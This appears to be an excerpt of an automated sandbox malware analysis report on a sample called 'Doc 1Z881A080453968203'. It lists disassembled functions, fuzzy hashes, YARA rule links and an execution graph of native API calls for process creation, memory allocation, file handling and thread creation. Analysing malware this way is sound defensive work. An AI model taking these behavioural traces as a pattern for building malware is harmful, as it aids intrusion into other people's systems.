                                        • RTL: Re-Waiting, xrefs: 01797BAC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 0-871070163
                                        • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                        • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                        • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                        • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                        Strings
                                        • RTL: Resource at %p, xrefs: 017972A3
                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                        • RTL: Re-Waiting, xrefs: 017972C1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-605551621
                                        • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                        • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                        • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                        • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$]:%u
                                        • API String ID: 48624451-3050659472
                                        • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                        • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                        • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                        • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-
                                        • API String ID: 1302938615-2137968064
                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                        • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                        • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$@
                                        • API String ID: 0-1194432280
                                        • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                        • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                        • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                        • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 017ACFBD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: CallFilterFunc@8
                                        • String ID: @$@4Qw@4Qw
                                        • API String ID: 4062629308-2383119779
                                        • Opcode ID: c947538d8c760a6ee067b4c3ae726fd7f69aa054e05ff6e09db42c71bdac6664
                                        • Instruction ID: 0cecd451173ab2f64df69d689d345252cdf160cc3ab290731d8c203cb063335e
                                        • Opcode Fuzzy Hash: c947538d8c760a6ee067b4c3ae726fd7f69aa054e05ff6e09db42c71bdac6664
                                        • Instruction Fuzzy Hash: A241C172940215DFDB319FA9C884AAEFBB8FF94B10F10462AE914DB359E774C901CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:4.2%
                                        Signature Coverage:2.2%
                                        Total number of Nodes:454
                                        Total number of Limit Nodes:74
                                        execution_graph 85763 2f1e870 85764 2f1e8d4 85763->85764 85792 2f158c0 85764->85792 85766 2f1ea04 85767 2f1e9fd 85767->85766 85799 2f159d0 85767->85799 85769 2f1ea80 85770 2f1ebb2 85769->85770 85790 2f1eba3 85769->85790 85803 2f1e650 85769->85803 85771 2f27910 NtClose 85770->85771 85773 2f1ebbc 85771->85773 85774 2f1eab5 85774->85770 85775 2f1eac0 85774->85775 85812 2f298c0 85775->85812 85777 2f1eae9 85778 2f1eaf2 85777->85778 85779 2f1eb08 85777->85779 85781 2f27910 NtClose 85778->85781 85815 2f1e540 CoInitialize 85779->85815 85783 2f1eafc 85781->85783 85782 2f1eb16 85817 2f27400 85782->85817 85785 2f1eb92 85821 2f27910 85785->85821 85787 2f1eb9c 85824 2f297e0 85787->85824 85788 2f1eb34 85788->85785 85791 2f27400 LdrInitializeThunk 85788->85791 85791->85788 85794 2f158f3 85792->85794 85793 2f15917 85793->85767 85794->85793 85827 2f274b0 85794->85827 85796 2f27910 NtClose 85798 2f159bc 85796->85798 85797 2f1593a 85797->85793 85797->85796 85798->85767 85800 2f159f5 85799->85800 85832 2f27290 85800->85832 85804 2f1e66c 85803->85804 85837 2f13db0 85804->85837 85806 2f1e693 85806->85774 85807 2f1e68a 85807->85806 85808 2f13db0 LdrLoadDll 85807->85808 85809 2f1e75e 85808->85809 85810 2f13db0 LdrLoadDll 85809->85810 85811 2f1e7bb 85809->85811 85810->85811 85811->85774 85841 2f27c20 85812->85841 85814 2f298db 85814->85777 85816 2f1e5a5 85815->85816 85816->85782 85818 2f2741d 85817->85818 85844 4fb2ba0 LdrInitializeThunk 85818->85844 85819 2f2744d 85819->85788 85822 2f2792a 85821->85822 85823 2f2793b NtClose 85822->85823 85823->85787 85845 2f27c70 85824->85845 85826 2f297f9 85826->85790 85828 2f274cd 85827->85828 85831 4fb2ca0 LdrInitializeThunk 85828->85831 85829 2f274f9 85829->85797 85831->85829 85833 2f272aa 85832->85833 85836 4fb2c60 LdrInitializeThunk 85833->85836 85834 2f15a69 85834->85769 85836->85834 85838 2f13dd4 85837->85838 85839 2f13e10 LdrLoadDll 85838->85839 85840 2f13ddb 85838->85840 85839->85840 85840->85807 85842 2f27c3a 85841->85842 85843 2f27c4b RtlAllocateHeap 85842->85843 85843->85814 85844->85819 85846 2f27c8d 85845->85846 85847 2f27c9e RtlFreeHeap 85846->85847 85847->85826 85848 2f16370 85849 2f1639a 85848->85849 85852 2f172b0 85849->85852 85851 2f163c4 85853 2f172cd 85852->85853 85859 2f27090 85853->85859 85855 2f1731d 85856 2f17324 85855->85856 85864 2f27160 85855->85864 85856->85851 85858 2f1734d 85858->85851 85860 2f270b1 85859->85860 85861 2f2711a 85859->85861 85860->85855 85869 4fb2f30 LdrInitializeThunk 85861->85869 85862 2f27153 85862->85855 85865 2f271ff 85864->85865 85866 2f27184 85864->85866 85870 4fb2d10 LdrInitializeThunk 85865->85870 85866->85858 85867 2f27244 85867->85858 85869->85862 85870->85867 85871 2f242b0 85873 2f2430d 85871->85873 85872 2f24344 85873->85872 85876 2f20180 85873->85876 85875 2f24326 85877 2f2018a 85876->85877 85878 2f2014a 85877->85878 85881 2f20276 85877->85881 85891 2f277a0 85877->85891 85878->85875 85879 2f20299 85881->85879 85882 2f20310 85881->85882 85883 2f20325 85881->85883 85885 2f27910 NtClose 85882->85885 85884 2f27910 NtClose 85883->85884 85888 2f2032e 85884->85888 85886 2f20319 85885->85886 85886->85875 85887 2f2035a 85887->85875 85888->85887 85889 2f297e0 RtlFreeHeap 85888->85889 85890 2f2034e 85889->85890 85890->85875 85892 2f27836 85891->85892 85894 2f277c1 85891->85894 85893 2f2784c NtReadFile 85892->85893 85893->85881 85894->85881 85895 2f26df0 85896 2f26e11 85895->85896 85897 2f26e6e 85895->85897 85900 4fb2ee0 LdrInitializeThunk 85897->85900 85898 2f26e9f 85900->85898 85901 2f12078 85902 2f158c0 2 API calls 85901->85902 85903 2f120a3 85902->85903 85904 2f18f3b 85905 2f18f4a 85904->85905 85906 2f18f51 85905->85906 85907 2f297e0 RtlFreeHeap 85905->85907 85907->85906 85909 2f09420 85910 2f0942f 85909->85910 85911 2f09470 85910->85911 85912 2f0945d CreateThread 85910->85912 85913 2f0ade0 85916 2f29750 85913->85916 85915 2f0c451 85919 2f27a70 85916->85919 85918 2f29781 85918->85915 85920 2f27af4 85919->85920 85922 2f27a91 85919->85922 85921 2f27b0a NtAllocateVirtualMemory 85920->85921 85921->85918 85922->85918 85923 2f150e0 85928 2f26fa0 85923->85928 85927 2f1512b 85929 2f26fba 85928->85929 85937 4fb2c0a 85929->85937 85930 2f15116 85932 2f279b0 85930->85932 85933 2f27a2e 85932->85933 85935 2f279d1 85932->85935 85940 4fb2e80 LdrInitializeThunk 85933->85940 85934 2f27a5f 85934->85927 85935->85927 85938 4fb2c1f LdrInitializeThunk 85937->85938 85939 4fb2c11 85937->85939 85938->85930 85939->85930 85940->85934 85941 2f1a020 85946 2f19d50 85941->85946 85943 2f1a02d 85962 2f199f0 85943->85962 85945 2f1a049 85947 2f19d75 85946->85947 85974 2f176d0 85947->85974 85950 2f19eb2 85950->85943 85952 2f19ec9 85952->85943 85954 2f19ec0 85954->85952 85957 2f19fb1 85954->85957 85989 2f23820 85954->85989 85994 2f19450 85954->85994 85956 2f23820 GetFileAttributesW 85956->85957 85957->85956 85958 2f1a009 85957->85958 86003 2f197b0 85957->86003 85960 2f297e0 RtlFreeHeap 85958->85960 85961 2f1a010 85960->85961 85961->85943 85963 2f19a06 85962->85963 85971 2f19a11 85962->85971 85964 2f298c0 RtlAllocateHeap 85963->85964 85964->85971 85965 2f19a27 85965->85945 85966 2f176d0 GetFileAttributesW 85966->85971 85967 2f19d1e 85968 2f19d37 85967->85968 85969 2f297e0 RtlFreeHeap 85967->85969 85968->85945 85969->85968 85970 2f23820 GetFileAttributesW 85970->85971 85971->85965 85971->85966 85971->85967 85971->85970 85972 2f19450 RtlFreeHeap 85971->85972 85973 2f197b0 RtlFreeHeap 85971->85973 85972->85971 85973->85971 85975 2f176f1 85974->85975 85976 2f176f8 GetFileAttributesW 85975->85976 85977 2f17703 85975->85977 85976->85977 85977->85950 85978 2f21da0 85977->85978 85979 2f21dae 85978->85979 85980 2f21db5 85978->85980 85979->85954 85981 2f13db0 LdrLoadDll 85980->85981 85982 2f21dea 85981->85982 85983 2f21df9 85982->85983 86007 2f21870 LdrLoadDll 85982->86007 85985 2f298c0 RtlAllocateHeap 85983->85985 85988 2f21f94 85983->85988 85986 2f21e12 85985->85986 85987 2f297e0 RtlFreeHeap 85986->85987 85986->85988 85987->85988 85988->85954 85990 2f2387d 85989->85990 85991 2f238b4 85990->85991 86008 2f17720 85990->86008 85991->85954 85993 2f23896 85993->85954 85995 2f19476 85994->85995 86012 2f1cc70 85995->86012 85997 2f194dd 85999 2f19660 85997->85999 86000 2f194fb 85997->86000 85998 2f19645 85998->85954 85999->85998 86001 2f19310 RtlFreeHeap 85999->86001 86000->85998 86017 2f19310 86000->86017 86001->85999 86004 2f197d6 86003->86004 86005 2f1cc70 RtlFreeHeap 86004->86005 86006 2f19852 86005->86006 86006->85957 86007->85983 86009 2f176f0 86008->86009 86010 2f17703 86008->86010 86009->86010 86011 2f176f8 GetFileAttributesW 86009->86011 86010->85993 86011->86010 86014 2f1cc7d 86012->86014 86013 2f1cc93 86013->85997 86014->86013 86015 2f297e0 RtlFreeHeap 86014->86015 86016 2f1ccc6 86015->86016 86016->85997 86018 2f19326 86017->86018 86021 2f1cce0 86018->86021 86020 2f1942c 86020->86000 86022 2f1cd04 86021->86022 86023 2f1cd9c 86022->86023 86024 2f297e0 RtlFreeHeap 86022->86024 86023->86020 86024->86023 86025 2f1b7a0 86027 2f1b7c9 86025->86027 86026 2f1b8cd 86027->86026 86028 2f1b873 FindFirstFileW 86027->86028 86028->86026 86030 2f1b88e 86028->86030 86029 2f1b8b4 FindNextFileW 86029->86030 86031 2f1b8c6 FindClose 86029->86031 86030->86029 86031->86026 86033 2f24920 86034 2f2497a 86033->86034 86036 2f24987 86034->86036 86037 2f224c0 86034->86037 86038 2f29750 NtAllocateVirtualMemory 86037->86038 86039 2f22501 86038->86039 86040 2f13db0 LdrLoadDll 86039->86040 86042 2f22606 86039->86042 86043 2f22547 86040->86043 86041 2f22580 Sleep 86041->86043 86042->86036 86043->86041 86043->86042 86044 2f2a920 86045 2f297e0 RtlFreeHeap 86044->86045 86046 2f2a935 86045->86046 86049 2f129ec 86054 2f17100 86049->86054 86052 2f27910 NtClose 86053 2f12a11 86052->86053 86055 2f1711a 86054->86055 86059 2f129fc 86054->86059 86060 2f27040 86055->86060 86058 2f27910 NtClose 86058->86059 86059->86052 86059->86053 86061 2f2705a 86060->86061 86064 4fb35c0 LdrInitializeThunk 86061->86064 86062 2f171ea 86062->86058 86064->86062 86065 2f1f150 86066 2f1f16d 86065->86066 86067 2f13db0 LdrLoadDll 86066->86067 86068 2f1f18b 86067->86068 86069 2f20ad0 86074 2f20adf 86069->86074 86070 2f20b69 86071 2f20b23 86072 2f297e0 RtlFreeHeap 86071->86072 86073 2f20b33 86072->86073 86074->86070 86074->86071 86075 2f20b64 86074->86075 86076 2f297e0 RtlFreeHeap 86075->86076 86076->86070 86082 2f26f50 86083 2f26f6a 86082->86083 86086 4fb2df0 LdrInitializeThunk 86083->86086 86084 2f26f92 86086->86084 86092 2f15055 86094 2f15080 86092->86094 86097 2f17480 86092->86097 86096 2f150ac 86094->86096 86101 2f17400 86094->86101 86098 2f17493 86097->86098 86108 2f26eb0 86098->86108 86100 2f174be 86100->86094 86102 2f17444 86101->86102 86107 2f17465 86102->86107 86114 2f26cb0 86102->86114 86104 2f17455 86105 2f17471 86104->86105 86106 2f27910 NtClose 86104->86106 86105->86094 86106->86107 86107->86094 86109 2f26f20 86108->86109 86111 2f26ed4 86108->86111 86113 4fb2dd0 LdrInitializeThunk 86109->86113 86110 2f26f45 86110->86100 86111->86100 86113->86110 86115 2f26d1f 86114->86115 86116 2f26cd4 86114->86116 86119 4fb4650 LdrInitializeThunk 86115->86119 86116->86104 86117 2f26d44 86117->86104 86119->86117 86120 4fb2ad0 LdrInitializeThunk 86121 2f17b5e 86122 2f17b63 86121->86122 86123 2f17b22 86122->86123 86125 2f16590 LdrInitializeThunk LdrInitializeThunk 86122->86125 86125->86123 86126 2f09480 86128 2f098db 86126->86128 86127 2f09d98 86128->86127 86130 2f29470 86128->86130 86131 2f29496 86130->86131 86136 2f03e30 86131->86136 86133 2f294d0 86133->86127 86134 2f294a2 86134->86133 86139 2f23f60 86134->86139 86143 2f12ae0 86136->86143 86138 2f03e3d 86138->86134 86140 2f23fba 86139->86140 86142 2f23fc7 86140->86142 86154 2f10fc0 86140->86154 86142->86133 86144 2f12af7 86143->86144 86146 2f12b10 86144->86146 86147 2f28350 86144->86147 86146->86138 86149 2f28368 86147->86149 86148 2f2838c 86148->86146 86149->86148 86150 2f26fa0 LdrInitializeThunk 86149->86150 86151 2f283e1 86150->86151 86152 2f297e0 RtlFreeHeap 86151->86152 86153 2f283fa 86152->86153 86153->86146 86155 2f10ffb 86154->86155 86170 2f17210 86155->86170 86157 2f11003 86158 2f112c2 86157->86158 86159 2f298c0 RtlAllocateHeap 86157->86159 86158->86142 86160 2f11019 86159->86160 86161 2f298c0 RtlAllocateHeap 86160->86161 86162 2f1102a 86161->86162 86163 2f298c0 RtlAllocateHeap 86162->86163 86165 2f11038 86163->86165 86168 2f110cb 86165->86168 86185 2f16020 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 86165->86185 86166 2f13db0 LdrLoadDll 86167 2f11282 86166->86167 86181 2f26680 86167->86181 86168->86166 86171 2f1723c 86170->86171 86172 2f17100 2 API calls 86171->86172 86173 2f1725f 86172->86173 86174 2f17281 86173->86174 86175 2f17269 86173->86175 86176 2f1729d 86174->86176 86179 2f27910 NtClose 86174->86179 86177 2f17274 86175->86177 86178 2f27910 NtClose 86175->86178 86176->86157 86177->86157 86178->86177 86180 2f17293 86179->86180 86180->86157 86182 2f266da 86181->86182 86183 2f266e7 86182->86183 86186 2f112e0 86182->86186 86183->86158 86185->86168 86202 2f174e0 86186->86202 86188 2f117e5 86188->86183 86189 2f11300 86189->86188 86206 2f20110 86189->86206 86192 2f114fe 86214 2f2a9f0 86192->86214 86193 2f1135b 86193->86188 86209 2f2a8c0 86193->86209 86195 2f1153e 86195->86188 86196 2f17480 LdrInitializeThunk 86195->86196 86199 2f0ff80 LdrInitializeThunk 86195->86199 86196->86195 86197 2f11513 86197->86195 86220 2f0ff80 86197->86220 86199->86195 86200 2f1166c 86200->86195 86201 2f17480 LdrInitializeThunk 86200->86201 86201->86200 86203 2f174ed 86202->86203 86204 2f17515 86203->86204 86205 2f1750e SetErrorMode 86203->86205 86204->86189 86205->86204 86207 2f29750 NtAllocateVirtualMemory 86206->86207 86208 2f20131 86207->86208 86208->86193 86210 2f2a8d0 86209->86210 86211 2f2a8d6 86209->86211 86210->86192 86212 2f298c0 RtlAllocateHeap 86211->86212 86213 2f2a8fc 86212->86213 86213->86192 86215 2f2a960 86214->86215 86216 2f298c0 RtlAllocateHeap 86215->86216 86217 2f2a9bd 86215->86217 86218 2f2a99a 86216->86218 86217->86197 86219 2f297e0 RtlFreeHeap 86218->86219 86219->86217 86223 2f27b80 86220->86223 86224 2f27b9a 86223->86224 86227 4fb2c70 LdrInitializeThunk 86224->86227 86225 2f0ffa2 86225->86200 86227->86225 86228 2f10400 86229 2f10404 86228->86229 86230 2f13db0 LdrLoadDll 86229->86230 86231 2f10437 86230->86231 86232 2f10483 86231->86232 86233 2f10470 PostThreadMessageW 86231->86233 86233->86232 86234 2f16740 86235 2f1675c 86234->86235 86236 2f167a9 86234->86236 86235->86236 86238 2f27910 NtClose 86235->86238 86237 2f168d2 86236->86237 86245 2f15b50 NtClose LdrInitializeThunk LdrInitializeThunk 86236->86245 86239 2f16774 86238->86239 86244 2f15b50 NtClose LdrInitializeThunk LdrInitializeThunk 86239->86244 86241 2f168ac 86241->86237 86246 2f15d20 NtClose LdrInitializeThunk LdrInitializeThunk 86241->86246 86244->86236 86245->86241 86246->86237 86247 2f16900 86248 2f16918 86247->86248 86250 2f16972 86247->86250 86248->86250 86251 2f1a510 86248->86251 86252 2f1a536 86251->86252 86257 2f1a74f 86252->86257 86278 2f27d00 86252->86278 86254 2f1a5ac 86255 2f2a9f0 2 API calls 86254->86255 86254->86257 86256 2f1a5c8 86255->86256 86256->86257 86258 2f1a696 86256->86258 86259 2f26fa0 LdrInitializeThunk 86256->86259 86257->86250 86260 2f14fd0 LdrInitializeThunk 86258->86260 86262 2f1a6b5 86258->86262 86261 2f1a624 86259->86261 86260->86262 86261->86258 86266 2f1a62d 86261->86266 86267 2f1a737 86262->86267 86284 2f26b70 86262->86284 86263 2f1a67e 86264 2f17480 LdrInitializeThunk 86263->86264 86268 2f1a68c 86264->86268 86265 2f1a65f 86299 2f23170 LdrInitializeThunk 86265->86299 86266->86257 86266->86263 86266->86265 86281 2f14fd0 86266->86281 86269 2f17480 LdrInitializeThunk 86267->86269 86268->86250 86273 2f1a745 86269->86273 86273->86250 86274 2f1a70e 86289 2f26c10 86274->86289 86276 2f1a728 86294 2f26d50 86276->86294 86279 2f27d1a 86278->86279 86280 2f27d27 CreateProcessInternalW 86279->86280 86280->86254 86282 2f27160 LdrInitializeThunk 86281->86282 86283 2f1500e 86282->86283 86283->86265 86285 2f26bdf 86284->86285 86287 2f26b94 86284->86287 86300 4fb39b0 LdrInitializeThunk 86285->86300 86286 2f26c04 86286->86274 86287->86274 86290 2f26c7c 86289->86290 86291 2f26c31 86289->86291 86301 4fb4340 LdrInitializeThunk 86290->86301 86291->86276 86292 2f26ca1 86292->86276 86295 2f26d71 86294->86295 86296 2f26dbc 86294->86296 86295->86267 86302 4fb2fb0 LdrInitializeThunk 86296->86302 86297 2f26de1 86297->86267 86299->86263 86300->86286 86301->86292 86302->86297 86303 2f27880 86304 2f278e6 86303->86304 86306 2f278a1 86303->86306 86305 2f278fc NtDeleteFile 86304->86305 86307 2f27640 86308 2f276e6 86307->86308 86310 2f27665 86307->86310 86309 2f276fc NtCreateFile 86308->86309 86311 2f20740 86312 2f2075c 86311->86312 86313 2f20784 86312->86313 86314 2f20798 86312->86314 86315 2f27910 NtClose 86313->86315 86316 2f27910 NtClose 86314->86316 86318 2f2078d 86315->86318 86317 2f207a1 86316->86317 86321 2f29900 RtlAllocateHeap 86317->86321 86320 2f207ac 86321->86320

                                        Executed Functions

                                        Function 02F09480 Relevance: 39.2, Strings: 31, Instructions: 441COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 27 2f09480-2f098d9 28 2f098ea-2f098f3 27->28 29 2f098f5-2f09904 28->29 30 2f09906-2f09910 28->30 29->28 32 2f09921-2f0992d 30->32 33 2f09943-2f09954 32->33 34 2f0992f-2f09941 32->34 36 2f09965-2f09971 33->36 34->32 37 2f09981-2f09992 36->37 38 2f09973-2f0997f 36->38 40 2f099a3-2f099af 37->40 38->36 41 2f099b1-2f099c0 40->41 42 2f099c2 40->42 41->40 44 2f099c9-2f099d0 42->44 45 2f099d2-2f099de 44->45 46 2f09a0e-2f09a15 44->46 47 2f099e0-2f099e4 45->47 48 2f099e5-2f099e7 45->48 49 2f09a17-2f09a4a 46->49 50 2f09a4c-2f09a50 46->50 47->48 51 2f099f8-2f09a0c 48->51 52 2f099e9-2f099f2 48->52 49->46 53 2f09a52-2f09a7c 50->53 54 2f09a7e-2f09a88 50->54 51->44 52->51 53->50 55 2f09a99-2f09aa2 54->55 56 2f09aa4-2f09ab6 55->56 57 2f09ab8-2f09ac1 55->57 56->55 59 2f09c17-2f09c1e 57->59 60 2f09ac7-2f09ad1 57->60 61 2f09dd2-2f09ddc 59->61 62 2f09c24-2f09c3d 59->62 63 2f09ad3-2f09ade 60->63 64 2f09b0b-2f09b1e 60->64 66 2f09ded-2f09df9 61->66 62->62 67 2f09c3f-2f09c48 62->67 68 2f09ae0-2f09ae4 63->68 69 2f09ae5-2f09ae7 63->69 65 2f09b2f-2f09b3b 64->65 72 2f09b60-2f09b6f 65->72 73 2f09b3d-2f09b4d 65->73 74 2f09e06-2f09e20 66->74 75 2f09dfb-2f09e04 66->75 76 2f09c67-2f09c71 67->76 77 2f09c4a-2f09c65 67->77 68->69 70 2f09ae9-2f09af8 69->70 71 2f09afa-2f09b03 69->71 78 2f09b09 70->78 71->78 82 2f09b71 72->82 83 2f09b76-2f09b7d 72->83 79 2f09b5e 73->79 80 2f09b4f-2f09b58 73->80 75->66 84 2f09c82-2f09c8e 76->84 77->67 78->60 79->65 80->79 82->59 86 2f09b9e-2f09ba8 83->86 87 2f09b7f-2f09b9c 83->87 88 2f09c90-2f09c9d 84->88 89 2f09c9f-2f09ca9 84->89 91 2f09bb9-2f09bc5 86->91 87->83 88->84 92 2f09cba-2f09cc3 89->92 93 2f09bc7-2f09bd9 91->93 94 2f09bdb-2f09be1 91->94 95 2f09cc5-2f09cd7 92->95 96 2f09cd9-2f09ce3 92->96 93->91 99 2f09be5-2f09bfe 94->99 95->92 100 2f09cf4-2f09d00 96->100 99->99 101 2f09c00-2f09c10 99->101 102 2f09d02-2f09d15 100->102 103 2f09d17-2f09d21 100->103 101->101 104 2f09c12 101->104 102->100 106 2f09d32-2f09d3e 103->106 104->57 107 2f09d40-2f09d4c 106->107 108 2f09d5c-2f09d66 106->108 109 2f09d5a 107->109 110 2f09d4e-2f09d54 107->110 111 2f09d77-2f09d7e 108->111 109->106 110->109 113 2f09d80-2f09d91 111->113 114 2f09d93 call 2f29470 111->114 115 2f09d68-2f09d71 113->115 117 2f09d98-2f09da2 114->117 115->111 118 2f09db3-2f09dbf 117->118 118->61 119 2f09dc1-2f09dd0 118->119 119->118
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0$1$1X$9$<$>$?$D$E$J$L$M$O$R$W$W$[$\$]$^$`$a$d$eI$h$m1$q$s!$v!$}$u
                                        • API String ID: 0-2001637370
                                        • Opcode ID: 2102b79a994bc8f02b92f66d9f83a54f5bda9d77fe57ecf1b9ee7f3c8aee9d2a
                                        • Instruction ID: 1b077eae87aba5a97947172b491812eef8e161b11acec5a3bacee3e6ab7b2113
                                        • Opcode Fuzzy Hash: 2102b79a994bc8f02b92f66d9f83a54f5bda9d77fe57ecf1b9ee7f3c8aee9d2a
                                        • Instruction Fuzzy Hash: E942BBB0E05269CFEB24CF45C898BDDBBB2BB44748F1081C9C1496B282D7B95AC8DF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F1B7A0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F1B884
                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02F1B8BF
                                        • FindClose.KERNELBASE(?), ref: 02F1B8CA
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: e94f535543a44cc601ff69f1c7aa4bcb31e75835e7008977380568f22e1b327e
                                        • Instruction ID: 3709aefb46cbde022588ff1e5cf010035a1522d9fe381aed5569187db478a8d9
                                        • Opcode Fuzzy Hash: e94f535543a44cc601ff69f1c7aa4bcb31e75835e7008977380568f22e1b327e
                                        • Instruction Fuzzy Hash: 89317371A00309BBDB20EFA0CC85FEF777C9F45798F544558FA08A7180DA70AA858BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F27640 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F2772D
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
